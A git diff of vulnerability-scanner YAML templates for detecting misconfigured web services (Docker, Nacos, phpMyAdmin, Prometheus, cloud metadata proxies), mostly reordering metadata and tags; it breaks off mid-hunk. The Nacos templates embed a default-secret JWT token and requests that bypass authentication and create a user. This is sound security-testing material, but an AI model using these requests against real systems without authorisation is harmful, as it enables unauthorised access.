b/http/misconfiguration/misconfigured-concrete5.yaml index cf28343f4f..49c86a2e7e 100644 --- a/http/misconfiguration/misconfigured-concrete5.yaml +++ b/http/misconfiguration/misconfigured-concrete5.yaml @@ -4,9 +4,9 @@ info: name: Misconfigured Concrete5 author: pdteam severity: low - tags: misconfig,concrete,cms metadata: max-request: 1 + tags: misconfig,concrete,cms http: - method: GET @@ -19,4 +19,4 @@ http: - type: word part: body words: - - 'concrete5 has encountered an issue' \ No newline at end of file + - 'concrete5 has encountered an issue' diff --git a/http/misconfiguration/misconfigured-docker.yaml b/http/misconfiguration/misconfigured-docker.yaml index b5e630508b..2643b43f53 100644 --- a/http/misconfiguration/misconfigured-docker.yaml +++ b/http/misconfiguration/misconfigured-docker.yaml @@ -7,9 +7,9 @@ info: description: A Docker container misconfiguration was discovered. The Docker daemon can listen for Docker Engine API requests via three different types of Socket - unix, tcp, and fd. With tcp enabled, the default setup provides un-encrypted and un-authenticated direct access to the Docker daemon. It is conventional to use port 2375 for un-encrypted, and port 2376 for encrypted communication with the daemon. reference: - https://madhuakula.com/content/attacking-and-auditing-docker-containers-using-opensource/attacking-docker-containers/misconfiguration.html - tags: docker,unauth,devops metadata: max-request: 1 + tags: docker,unauth,devops http: - method: GET diff --git a/http/misconfiguration/missing-sri.yaml b/http/misconfiguration/missing-sri.yaml index 75d31a0d97..8013cac97b 100644 --- a/http/misconfiguration/missing-sri.yaml +++ b/http/misconfiguration/missing-sri.yaml @@ -1,10 +1,11 @@ id: missing-sri + info: name: Missing Subresource Integrity author: lucky0x0d,PulseSecurity.co.nz severity: info description: | - Checks if script tags within the HTML response have Subresource Integrity implemented via the integrity attribute + Checks if script tags within the HTML response have Subresource Integrity implemented via the integrity attribute reference: - https://cheatsheetseries.owasp.org/cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity metadata: @@ -19,6 +20,7 @@ http: redirects: true max-redirects: 5 + matchers-condition: and matchers: - type: xpath diff --git a/http/misconfiguration/mlflow-unauth.yaml b/http/misconfiguration/mlflow-unauth.yaml index 10f00eb20f..6af5ca754c 100644 --- a/http/misconfiguration/mlflow-unauth.yaml +++ b/http/misconfiguration/mlflow-unauth.yaml @@ -8,8 +8,8 @@ info: Unauthenticated Access to MLflow dashboard. remediation: Add User Authentication metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"mlflow" tags: unauth,mlflow,oss,misconfig diff --git a/http/misconfiguration/mobiproxy-dashboard.yaml b/http/misconfiguration/mobiproxy-dashboard.yaml index 01ad167aa5..1800c12961 100644 --- a/http/misconfiguration/mobiproxy-dashboard.yaml +++ b/http/misconfiguration/mobiproxy-dashboard.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"MobiProxy" tags: dashboard,exposure,mobiproxy,misconfig diff --git a/http/misconfiguration/mobsf-framework-exposure.yaml b/http/misconfiguration/mobsf-framework-exposure.yaml index b35bf6a14e..86d86e1951 100644 --- a/http/misconfiguration/mobsf-framework-exposure.yaml +++ b/http/misconfiguration/mobsf-framework-exposure.yaml @@ -5,8 +5,8 @@ info: author: Shine severity: high metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"MobSF" tags: misconfig,exposure,mobsf diff --git a/http/misconfiguration/moleculer-microservices.yaml b/http/misconfiguration/moleculer-microservices.yaml index 13c926b0c8..6741fe9216 100644 --- a/http/misconfiguration/moleculer-microservices.yaml +++ b/http/misconfiguration/moleculer-microservices.yaml @@ -7,8 +7,8 @@ info: description: | Moleculer microservice was able to be accessed with no required authentication in place. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Moleculer Microservices Project" tags: misconfig,microservice,moleculer,exposure diff --git a/http/misconfiguration/mongodb-exporter-metrics.yaml b/http/misconfiguration/mongodb-exporter-metrics.yaml index ccf364d86d..bdba2ef5c5 100644 --- a/http/misconfiguration/mongodb-exporter-metrics.yaml +++ b/http/misconfiguration/mongodb-exporter-metrics.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: medium description: MongoDB exporter was detected. - metadata: - max-request: 1 - verified: true - shodan-query: title:"MongoDB exporter" + reference: + - https://github.com/percona/mongodb_exporter classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - https://github.com/percona/mongodb_exporter + metadata: + verified: true + max-request: 1 + shodan-query: title:"MongoDB exporter" tags: mongodb,exposure,debug,misconfig http: diff --git a/http/misconfiguration/multilaser-pro-setup.yaml b/http/misconfiguration/multilaser-pro-setup.yaml index 431ae522ab..8814d4179d 100644 --- a/http/misconfiguration/multilaser-pro-setup.yaml +++ b/http/misconfiguration/multilaser-pro-setup.yaml @@ -6,8 +6,8 @@ info: severity: high description: This allows the user to access quick setup settings and configuration page through /wizard.htm. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Setup Wizard" http.favicon.hash:2055322029 tags: misconfig,multilaser,setup,config diff --git a/http/misconfiguration/mysqld-exporter-metrics.yaml b/http/misconfiguration/mysqld-exporter-metrics.yaml index 3b50464c1c..44cf8bf469 100644 --- a/http/misconfiguration/mysqld-exporter-metrics.yaml +++ b/http/misconfiguration/mysqld-exporter-metrics.yaml @@ -7,11 +7,11 @@ info: description: MYSQL Exporter panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"MySQLd exporter" tags: mysqld,exposure,debug,misconfig diff --git a/http/misconfiguration/nacos-authentication-bypass.yaml b/http/misconfiguration/nacos-authentication-bypass.yaml index 5f41e419fa..44dc0b2f7e 100644 --- a/http/misconfiguration/nacos-authentication-bypass.yaml +++ b/http/misconfiguration/nacos-authentication-bypass.yaml @@ -6,17 +6,16 @@ info: severity: critical description: | The authentication function of Nacos is can be bypass through default JWT secret. + remediation: Change value of jwt secret in the configurations reference: - https://github.com/alibaba/nacos/issues/10060 - https://avd.aliyun.com/detail?id=AVD-2023-1655789 - https://nacos.io/zh-cn/docs/auth.html - remediation: Change value of jwt secret in the configurations metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Nacos" tags: auth-bypass,nacos,misconfig,jwt - variables: token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g @@ -25,7 +24,9 @@ http: path: - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}" - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}" + stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/nacos/nacos-create-user.yaml b/http/misconfiguration/nacos/nacos-create-user.yaml index 8db1c05991..c125d0e91b 100644 --- a/http/misconfiguration/nacos/nacos-create-user.yaml +++ b/http/misconfiguration/nacos/nacos-create-user.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml metadata: + verified: true max-request: 3 shodan-query: title:"Nacos" - verified: true tags: nacos,unauth,bypass,instrusive http: @@ -19,11 +19,9 @@ http: - | POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1 Host: {{Hostname}} - - | GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1 Host: {{Hostname}} - - | DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/misconfiguration/namedprocess-exporter-metrics.yaml b/http/misconfiguration/namedprocess-exporter-metrics.yaml index 5f816d4696..18bf99f141 100644 --- a/http/misconfiguration/namedprocess-exporter-metrics.yaml +++ b/http/misconfiguration/namedprocess-exporter-metrics.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Named Process Exporter" tags: namedprocess,exposure,debug,misconfig diff --git a/http/misconfiguration/nextcloud-install.yaml b/http/misconfiguration/nextcloud-install.yaml index 611cab5ae2..c27c1e5424 100644 --- a/http/misconfiguration/nextcloud-install.yaml +++ b/http/misconfiguration/nextcloud-install.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html - tags: tech,nextcloud,storage,misconfig metadata: max-request: 1 + tags: tech,nextcloud,storage,misconfig http: - method: GET @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -28,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/nginx/nginx-status.yaml b/http/misconfiguration/nginx/nginx-status.yaml index d79b8e45c5..dde8f14c48 100644 --- a/http/misconfiguration/nginx/nginx-status.yaml +++ b/http/misconfiguration/nginx/nginx-status.yaml @@ -4,9 +4,9 @@ info: name: Nginx Status Page author: dhiyaneshDK severity: info - tags: misconfig,nginx,status metadata: max-request: 2 + tags: misconfig,nginx,status http: - method: GET diff --git a/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml b/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml index a5cc038770..c6cf07a0e7 100644 --- a/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml +++ b/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml @@ -6,9 +6,9 @@ info: severity: low reference: - https://github.com/vozlt/nginx-module-vts - tags: status,nginx,misconfig metadata: max-request: 1 + tags: status,nginx,misconfig http: - method: GET @@ -23,6 +23,7 @@ http: - "Host" - "Zone" condition: and + - type: status status: - 200 diff --git a/http/misconfiguration/ngrok-status-page.yaml b/http/misconfiguration/ngrok-status-page.yaml index d5164d1352..506fc3079d 100644 --- a/http/misconfiguration/ngrok-status-page.yaml +++ b/http/misconfiguration/ngrok-status-page.yaml @@ -5,10 +5,10 @@ info: author: pussycat0x severity: low description: | - Ngrok is a popular platform that provides secure tunnels to localhost, allowing users to expose a local web server to the internet.The Ngrok status page is a web page that provides real-time information about the health and performance of the Ngrok service. + Ngrok is a popular platform that provides secure tunnels to localhost, allowing users to expose a local web server to the internet.The Ngrok status page is a web page that provides real-time information about the health and performance of the Ngrok service. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"ngrok" tags: ngrok,misconfig,status @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/node-exporter-metrics.yaml b/http/misconfiguration/node-exporter-metrics.yaml index 712d75131a..158ad7cd10 100644 --- a/http/misconfiguration/node-exporter-metrics.yaml +++ b/http/misconfiguration/node-exporter-metrics.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: low description: Information Disclosure of Garbage Collection - tags: node,exposure,debug,misconfig metadata: max-request: 1 + tags: node,exposure,debug,misconfig http: - method: GET diff --git a/http/misconfiguration/nomad-jobs.yaml b/http/misconfiguration/nomad-jobs.yaml index 02d0a3c1e4..e5bf92dbd4 100644 --- a/http/misconfiguration/nomad-jobs.yaml +++ b/http/misconfiguration/nomad-jobs.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: nomad,devops,hashicorp,panel,misconfig metadata: max-request: 1 + tags: nomad,devops,hashicorp,panel,misconfig http: - method: GET diff --git a/http/misconfiguration/ntop-panel-exposed.yaml b/http/misconfiguration/ntop-panel-exposed.yaml index 38d855fb20..c5128a3003 100644 --- a/http/misconfiguration/ntop-panel-exposed.yaml +++ b/http/misconfiguration/ntop-panel-exposed.yaml @@ -5,8 +5,8 @@ info: author: tess severity: unknown metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Configure ntop" tags: misconfig,ntop,exposure diff --git a/http/misconfiguration/ntopng-traffic-dashboard.yaml b/http/misconfiguration/ntopng-traffic-dashboard.yaml index dd197903a9..44369ad71b 100644 --- a/http/misconfiguration/ntopng-traffic-dashboard.yaml +++ b/http/misconfiguration/ntopng-traffic-dashboard.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"ntopng - Traffic Dashboard" tags: misconfig,ntopng,dashboard diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml index 872f5eb82b..c668f50c12 100644 --- a/http/misconfiguration/odoo-unprotected-database.yaml +++ b/http/misconfiguration/odoo-unprotected-database.yaml @@ -9,8 +9,8 @@ info: remediation: | Implement and enforce proper authentication and access control measures to protect the Odoo database manager. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Odoo" tags: odoo,database,unauth,misconfig @@ -27,4 +27,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/office365-open-redirect.yaml b/http/misconfiguration/office365-open-redirect.yaml index e8cae5906b..6461e11544 100644 --- a/http/misconfiguration/office365-open-redirect.yaml +++ b/http/misconfiguration/office365-open-redirect.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-601 - tags: redirect,office365,microsoft,misconfig metadata: max-request: 1 + tags: redirect,office365,microsoft,misconfig,intrusive http: - method: GET diff --git a/http/misconfiguration/oneinstack-control-center.yaml b/http/misconfiguration/oneinstack-control-center.yaml index 1ebac8720e..f119ddc0ec 100644 --- a/http/misconfiguration/oneinstack-control-center.yaml +++ b/http/misconfiguration/oneinstack-control-center.yaml @@ -14,8 +14,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"OneinStack" tags: misconfig,exposure,panel,oneinstack diff --git a/http/misconfiguration/openstack-config.yaml b/http/misconfiguration/openstack-config.yaml index 2584c8bf73..b55907f138 100644 --- a/http/misconfiguration/openstack-config.yaml +++ b/http/misconfiguration/openstack-config.yaml @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/v1/info" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/oracle-reports-services.yaml b/http/misconfiguration/oracle-reports-services.yaml index 1410148985..b8cf043c43 100644 --- a/http/misconfiguration/oracle-reports-services.yaml +++ b/http/misconfiguration/oracle-reports-services.yaml @@ -6,9 +6,9 @@ info: severity: info description: Oracle Reports Services - Servlet Command dashboard metadata: + verified: true max-request: 3 shodan-query: title:"Oracle Forms" - verified: true tags: exposure,oracle,misconfig http: @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/oracle/reports/" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/pa11y-dashboard.yaml b/http/misconfiguration/pa11y-dashboard.yaml index 1cd110590a..e602048b2d 100644 --- a/http/misconfiguration/pa11y-dashboard.yaml +++ b/http/misconfiguration/pa11y-dashboard.yaml @@ -5,8 +5,8 @@ info: author: tess severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Pa11y Dashboard" tags: misconfig,exposure,pa11y diff --git a/http/misconfiguration/pcdn-cache-node.yaml b/http/misconfiguration/pcdn-cache-node.yaml index 79fcc3c29c..20206e65e2 100644 --- a/http/misconfiguration/pcdn-cache-node.yaml +++ b/http/misconfiguration/pcdn-cache-node.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"PCDN Cache Node Dataset" tags: node,pcdn,misconfig diff --git a/http/misconfiguration/perfsonar-toolkit.yaml b/http/misconfiguration/perfsonar-toolkit.yaml index c5c7c803b8..0e267ed5bc 100644 --- a/http/misconfiguration/perfsonar-toolkit.yaml +++ b/http/misconfiguration/perfsonar-toolkit.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo?fbid=619180260252497&set=pcb.619180283585828 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"perfSONAR" tags: misconfig,perfsonar,toolkit @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -28,4 +29,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index dd29783700..e944e1e579 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -5,15 +5,15 @@ info: author: DhiyaneshDk severity: medium description: PgHero Dashboard Exposure panel was detected. + reference: + - https://github.com/ankane/pghero classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - reference: - - https://github.com/ankane/pghero metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"PgHero" tags: exposure,panel,pghero,misconfig diff --git a/http/misconfiguration/php-debugbar-exposure.yaml b/http/misconfiguration/php-debugbar-exposure.yaml index 9ee3f81c12..cc75345a76 100644 --- a/http/misconfiguration/php-debugbar-exposure.yaml +++ b/http/misconfiguration/php-debugbar-exposure.yaml @@ -11,10 +11,10 @@ info: - http://phpdebugbar.com/ - https://github.com/maximebf/php-debugbar metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"phpdebugbar" - tags: misconfig,php,phpdebug,exposure + tags: hackerone,misconfig,php,phpdebug,exposure http: - method: GET diff --git a/http/misconfiguration/php-fpm-status.yaml b/http/misconfiguration/php-fpm-status.yaml index 50066e6685..231e1e4399 100644 --- a/http/misconfiguration/php-fpm-status.yaml +++ b/http/misconfiguration/php-fpm-status.yaml @@ -4,9 +4,9 @@ info: name: PHP-FPM Status author: geeknik severity: unknown - tags: config,misconfig metadata: max-request: 1 + tags: config,misconfig http: - method: GET @@ -22,6 +22,7 @@ http: - 'start time:' - 'pid:' condition: and + - type: status status: - 200 diff --git a/http/misconfiguration/php-src-disclosure.yaml b/http/misconfiguration/php-src-disclosure.yaml index f74dfbe3f0..e8bb5e63f3 100644 --- a/http/misconfiguration/php-src-disclosure.yaml +++ b/http/misconfiguration/php-src-disclosure.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-540 - tags: php,phpcli,diclosure,misconfig metadata: max-request: 2 + tags: php,phpcli,diclosure,misconfig http: - raw: diff --git a/http/misconfiguration/phpcli-stack-trace.yaml b/http/misconfiguration/phpcli-stack-trace.yaml index 6418361fc5..47f0294e39 100644 --- a/http/misconfiguration/phpcli-stack-trace.yaml +++ b/http/misconfiguration/phpcli-stack-trace.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: The requested resource - tags: misconfig,phpcli + tags: misconfig,phpcli,intrusive http: - method: GET diff --git a/http/misconfiguration/phpmemcached-admin-panel.yaml b/http/misconfiguration/phpmemcached-admin-panel.yaml index 71370a61c7..a0d2bacfe8 100644 --- a/http/misconfiguration/phpmemcached-admin-panel.yaml +++ b/http/misconfiguration/phpmemcached-admin-panel.yaml @@ -5,8 +5,8 @@ info: author: tess severity: medium metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"phpMemcachedAdmin" tags: phpmemcached,exposure,misconfig diff --git a/http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml b/http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml index e57ebb31ec..b888eb2ca6 100644 --- a/http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml +++ b/http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: phpmyadmin,misconfig,edb metadata: max-request: 2 + tags: phpmyadmin,misconfig,edb http: - method: GET @@ -22,6 +22,7 @@ http: - "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml b/http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml index 08432b3df2..cd85a6621c 100644 --- a/http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml +++ b/http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: phpmyadmin,misconfig metadata: max-request: 10 + tags: phpmyadmin,misconfig http: - method: GET @@ -28,6 +28,7 @@ http: - "{{BaseURL}}/admin/phpMyAdmin/server_import.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 097ba6eb0d..795e3210c7 100644 --- a/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ b/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -10,8 +10,8 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 16 verified: true + max-request: 16 shodan-query: http.html:"phpMyAdmin" tags: phpmyadmin,misconfig @@ -36,6 +36,7 @@ http: - "{{BaseURL}/phpMyAdminOLD/setup/index.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/misconfiguration/phpnow-works.yaml b/http/misconfiguration/phpnow-works.yaml index 8bf0695d41..948314e2fb 100644 --- a/http/misconfiguration/phpnow-works.yaml +++ b/http/misconfiguration/phpnow-works.yaml @@ -7,8 +7,8 @@ info: reference: - https://www.facebook.com/photo/?fbid=618545156982674&set=a.467014098802448 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "PHPnow works" tags: misconfig,phpnow,exposure @@ -28,4 +28,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/misconfiguration/pinpoint-unauth.yaml b/http/misconfiguration/pinpoint-unauth.yaml index f35557d0b3..db09530dd9 100644 --- a/http/misconfiguration/pinpoint-unauth.yaml +++ b/http/misconfiguration/pinpoint-unauth.yaml @@ -6,9 +6,9 @@ info: severity: high reference: - https://github.com/pinpoint-apm/pinpoint - tags: pippoint,unauth,misconfig metadata: max-request: 1 + tags: pippoint,unauth,misconfig http: - method: GET diff --git a/http/misconfiguration/postgres-exporter-metrics.yaml b/http/misconfiguration/postgres-exporter-metrics.yaml index 1a60b3097b..22f1618011 100644 --- a/http/misconfiguration/postgres-exporter-metrics.yaml +++ b/http/misconfiguration/postgres-exporter-metrics.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Postgres exporter" tags: postgres,exposure,debug,misconfig diff --git a/http/misconfiguration/private-key-exposure.yaml b/http/misconfiguration/private-key-exposure.yaml index 25b48cb168..32491d0f64 100644 --- a/http/misconfiguration/private-key-exposure.yaml +++ b/http/misconfiguration/private-key-exposure.yaml @@ -5,9 +5,9 @@ info: author: aashiq severity: high description: Searches for private key exposure by attempting to query the helper endpoint on node_modules - tags: exposure,node,misconfig metadata: max-request: 1 + tags: exposure,node,misconfig http: - method: GET @@ -24,4 +24,4 @@ http: words: - "Index of /node_modules/mqtt/test/helpers" - "Parent Directory" - condition: and \ No newline at end of file + condition: and diff --git a/http/misconfiguration/prometheus-promtail.yaml b/http/misconfiguration/prometheus-promtail.yaml index d40e96ec3c..3929674bb8 100644 --- a/http/misconfiguration/prometheus-promtail.yaml +++ b/http/misconfiguration/prometheus-promtail.yaml @@ -10,8 +10,8 @@ info: - https://grafana.com/docs/loki/latest/clients/promtail/ - https://github.com/grafana/loki/issues/8680 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:932345713 tags: misconfig,prometheus,promtail,exposure diff --git a/http/misconfiguration/prometheus/prometheus-config.yaml b/http/misconfiguration/prometheus/prometheus-config.yaml index 13a7b245b9..547215e821 100644 --- a/http/misconfiguration/prometheus/prometheus-config.yaml +++ b/http/misconfiguration/prometheus/prometheus-config.yaml @@ -4,13 +4,12 @@ info: name: Prometheus Config API Endpoint Discovery author: geeknik severity: info - description: A Prometheus config API endpoint was discovered. The config endpoint returns the loaded Prometheus configuration file along with the addresses of targets and alerting/discovery services alongside the - credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). + description: A Prometheus config API endpoint was discovered. The config endpoint returns the loaded Prometheus configuration file along with the addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder (although this still leaks the username). reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,config,misconfig metadata: max-request: 1 + tags: prometheus,config,misconfig http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-exporter.yaml b/http/misconfiguration/prometheus/prometheus-exporter.yaml index f0e3bd5e94..05bc102262 100644 --- a/http/misconfiguration/prometheus/prometheus-exporter.yaml +++ b/http/misconfiguration/prometheus/prometheus-exporter.yaml @@ -7,9 +7,9 @@ info: description: Prometheus exporter detector reference: - https://github.com/prometheus/prometheus/wiki/Default-port-allocations - tags: prometheus,misconfig metadata: max-request: 1 + tags: prometheus,misconfig http: - method: GET @@ -29,4 +29,4 @@ http: part: body group: 1 regex: - - "(.*?)" \ No newline at end of file + - "(.*?)" diff --git a/http/misconfiguration/prometheus/prometheus-flags.yaml b/http/misconfiguration/prometheus/prometheus-flags.yaml index fbe63814b6..1a85c16b45 100644 --- a/http/misconfiguration/prometheus/prometheus-flags.yaml +++ b/http/misconfiguration/prometheus/prometheus-flags.yaml @@ -7,9 +7,9 @@ info: description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username. reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,leak,misconfig metadata: max-request: 1 + tags: prometheus,leak,misconfig http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-log.yaml b/http/misconfiguration/prometheus/prometheus-log.yaml index 78cfcda884..e05afa1a55 100644 --- a/http/misconfiguration/prometheus/prometheus-log.yaml +++ b/http/misconfiguration/prometheus/prometheus-log.yaml @@ -4,9 +4,9 @@ info: name: Exposed Prometheus author: dhiyaneshDK severity: low - tags: prometheus,misconfig metadata: max-request: 2 + tags: prometheus,misconfig http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-targets.yaml b/http/misconfiguration/prometheus/prometheus-targets.yaml index 590a073338..b1e02cb740 100644 --- a/http/misconfiguration/prometheus/prometheus-targets.yaml +++ b/http/misconfiguration/prometheus/prometheus-targets.yaml @@ -4,14 +4,12 @@ info: name: Prometheus targets API endpoint author: geeknik severity: info - description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels - that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive - data in these labels, oftentimes without the developer's knowledge. + description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer's knowledge. reference: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ - tags: prometheus,misconfig metadata: max-request: 1 + tags: prometheus,misconfig http: - method: GET diff --git a/http/misconfiguration/proxy/metadata-alibaba.yaml b/http/misconfiguration/proxy/metadata-alibaba.yaml index e32c0a5382..b9079ed81b 100644 --- a/http/misconfiguration/proxy/metadata-alibaba.yaml +++ b/http/misconfiguration/proxy/metadata-alibaba.yaml @@ -7,12 +7,12 @@ id: metadata-service-alibaba # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. - info: name: Alibaba Metadata Service Check author: sullo severity: critical description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://www.alibabacloud.com/help/doc-detail/108460.htm - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -21,10 +21,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. - tags: exposure,config,alibaba,proxy,misconfig,metadata metadata: max-request: 2 + tags: exposure,config,alibaba,proxy,misconfig,metadata http: - raw: diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index 900b74afdd..bc9fe906f0 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -7,26 +7,25 @@ id: metadata-service-aws # # The proxy may also be vulnerable to host/port 